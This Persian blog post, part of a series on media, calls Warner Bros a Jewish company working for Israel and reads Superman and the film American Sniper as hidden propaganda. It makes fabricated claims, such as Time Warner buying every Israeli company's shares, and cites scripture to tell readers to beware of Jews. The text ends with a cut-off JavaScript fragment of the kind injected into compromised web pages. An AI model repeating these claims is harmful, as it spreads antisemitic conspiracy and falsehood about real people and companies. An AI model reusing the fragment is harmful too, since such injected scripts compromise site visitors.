رسانه، علم غالب امروز – قسمت هشتم

« به نام خدا »

شرکت WB (برادران وارنر – Warner Bros Entertainment Co) یکی از بزرگ ترین شرکت های یهودی فعال در زمینه رسانه هست.

شرکت برادران وارنر که در سال 1923 واقع در مکان هالیوود در شهر لوس آنجلسhttps://lh5.googleusercontent.com/-FWmT_QaBmts/AAAAAAAAAAI/AAAAAAAAAHA/MwByOvF88GE/s0-c-k-no-ns/photo.jpg توسط چهار برادر تاسیس شد، شرکتی بسیار فعال و پویا هست که سالانه تعداد بسیار زیادی فیلم و بازی در زمینه های مختلف تولید میکند. عنوان های سوپرمن و بتمن، 300، آرگو، تک تیر انداز آمریکایی، باگز بانی و … همه و همه ساخته این شرکت هستند. چیزی که در اسم این شرکت وجود دارد، واژه Entertainment به معنای سرگرمی است. اما آیا واقعا هدف و منظور اصلی آنان، این بوده است؟

 

اطلاعاتی درمورد این شرکت وجود دارند که بسیار جالب هستند. تایم وارنر جایزه ای را به پاس پشتیبانی همه جانبه از اسرائیل از شخص متانیاهو دریافت کرده است. حدود یک سوم از همه سرمایه گذاری های این شرکت در سرزمین های اشغالی انجام میشود و در همین راستا همه سهام های شرکت های اسرائیلی توسط این شرکت خریداری میشه. سرمایه گذاری بسیاری روی فیلم هایش انجام میده و البته سودش بیشتر هم بیشتر میشود!

 

It’s a bird… It’s a plane… It’s Superman!

http://cartoon-characters.com/wp-content/uploads/2014/05/Superman.jpg

یکی از شخصیت های ساخته این شرکت، سوپرمن می باشد که یکی از معروف ترین ساخته های این شرکت هست. اسم واقعی که روی این شخصیت گذاشته شده بود، کال ایل بود. یکی از خاخام های یهودی این کلمه رو به معنای « صدای خدا » معنی کرده هست. جالبه که توی اسلام، برای این منظور، از واژه « کلیم الله » برای حضرت موسی استفاده شده است! سوپرمن در واقع توسط والدینش توی یه سفینه ای گذاشته میشه و به زمین فرستاده میشه. جالبه که حضرت موسی در زمان بچگی نیز داخل سبدی روی رودخانه گذاشته میشه! رنگ بندی لباس سوپر نیز شبیه پرچم آمریکاست.

سوپرمن انرژی خودشو از خورشید میگیره. جالبه که خورشید در یهود یا مسیح خیلی مورد علاقه مردم هست. روز تعطیلی مسیحی ها یکشنبه هست که در واقع Sun day یعنی روز خورشید است! البته خورشید در مباحث فراماسونری نیز وارد میشود که در اینجا به آن نمیپردازیم.

در واقع، آدم هایی که برای این فلیم کار میکنند کاملا نشون میده که چطور آدمهایی هستند!
در آیات قرآن خیلی گفته شده که از یهود بر حذر باشید! ما شاید کاری به کار اونها نداشته باشیم، ولی قطعا اونها کاری به ما دارند!
در مورد سوپرمن، حتی یک داستانی نوشته شده که در مورد آزادی و فتنه و اینهاست که سوپرمن ایران رو هم نجات میده!

.

.

.

خب، به ادامه بحث فیلم تک تیر انداز می پردازیم…

کریس و مصطفی، مقایسه دو تک تیر انداز که یکی از اسلام و دیگری مسیحی هست. در شرایطی کریس به عراق میره و وقتی نیروها در حال پیشروی هستند، باید ازشون مراقبت کنه. از یک جایی به بعد هم ماموریتش این میشه که تک تیر انداز مقابل خودش رو بزنه.

در این فیلم، کلا تعداد محدودی زن رو بیشتر نشون نمیده. یکیش همون مادری هست که در ابتدای فیلم بچشو میفرسته جلو که دستش غیر عادیه و به این ترتیب این حس به آدم القا میشه که هرکی که چادر دستشه میتونه یک تروریست باشه! جای دیگری از فیلم هم یک زن باحجاب دیگه هست که اون رو به صورت جاسوس نشون داده که جای سربازها رو لو میده.

در صحنه ای نشون داده میشه که عراقی ها یکی از افرادشون رو روی دستشون گرفتن و مثلا به عنوان شهید دارن حملش میکنند در حالی که اون طرف یک آدم پست بود! در نتیجه هنگامی که در واقعیت، شهدای واقعی رو میبینیم که در فلسطین روی دست ها منتقل میشن، کاملا ذهن مردم عوض شده و فکر میکنند که این ها نیز …

E08_01

در صحنه های مختلف، نشون داده میشه که کریس چقدر با زن و بچش خوب و مهربون برخورد میکنه و در مقابل مصطفی رو نشون میده که چقد بی احساس هست.

در وسطهای فیلم، پسر بچه ای رو نشون میده که یک آر پی جی دستش گرفته و آماده شلیک میشه و کریس رو نشون میده که چه فشاری رو تحمل میکنه و نفس نفسی میزنه که بگه من حتی در مقابل بچه های دشمنانم هم وجدان دارم! بعد که برمیگرده البته اثراتش رو هم روی زندگیش میگذاره!

E08_02

در جاهای جلوتر فیلم، صحنه جانبازی و اثر جنگ روی زندگی رو نشون میده که کریس در اثر برخورد با عراقی ها در زندگیش چقدر به صداهای مختلف و ناگهانی حساس شده و واکنش شدید نشون میده. در جاهایی نیز احترامی که مردم برای فرمانده جنگ قائل هستند به نمایش کشیده میشه. یکی رو نشون میده که در جنگ مجروح شده ولی باز هم همسرش اون رو رها نمیکنه. برخورد های بسیار خوب آمریکایی ها به طوری که در دیالوگی گفته میشه «خوب شد من مجروح شدم نه تو!» و همدیگرو برادر صدا میکنند!

 

در ادامه، مراسم شهادت رو نشون میده که از نظر اونها طرف شهید محسوب میشه و بهش احترام می گذارند.

E08_03

در انتها هم بعد از اینکه از عراق برمیگرده، به طرز مشکوکی همونجا کشته شده و صحنه آخر فیلم هم یک صحنه واقعی هست.

 

البته که نکات بی شماری از اینگونه فیلم ها میتوان استخراج کرد که در این توضیحات کوتاه نمی گنجد.

 

در قسمت بعدی، به بررسی بعضی از نماد ها و اصل ها در فیلم برداری ها پرداخته می شود…var d=document;var s=d.createElement(‘script’);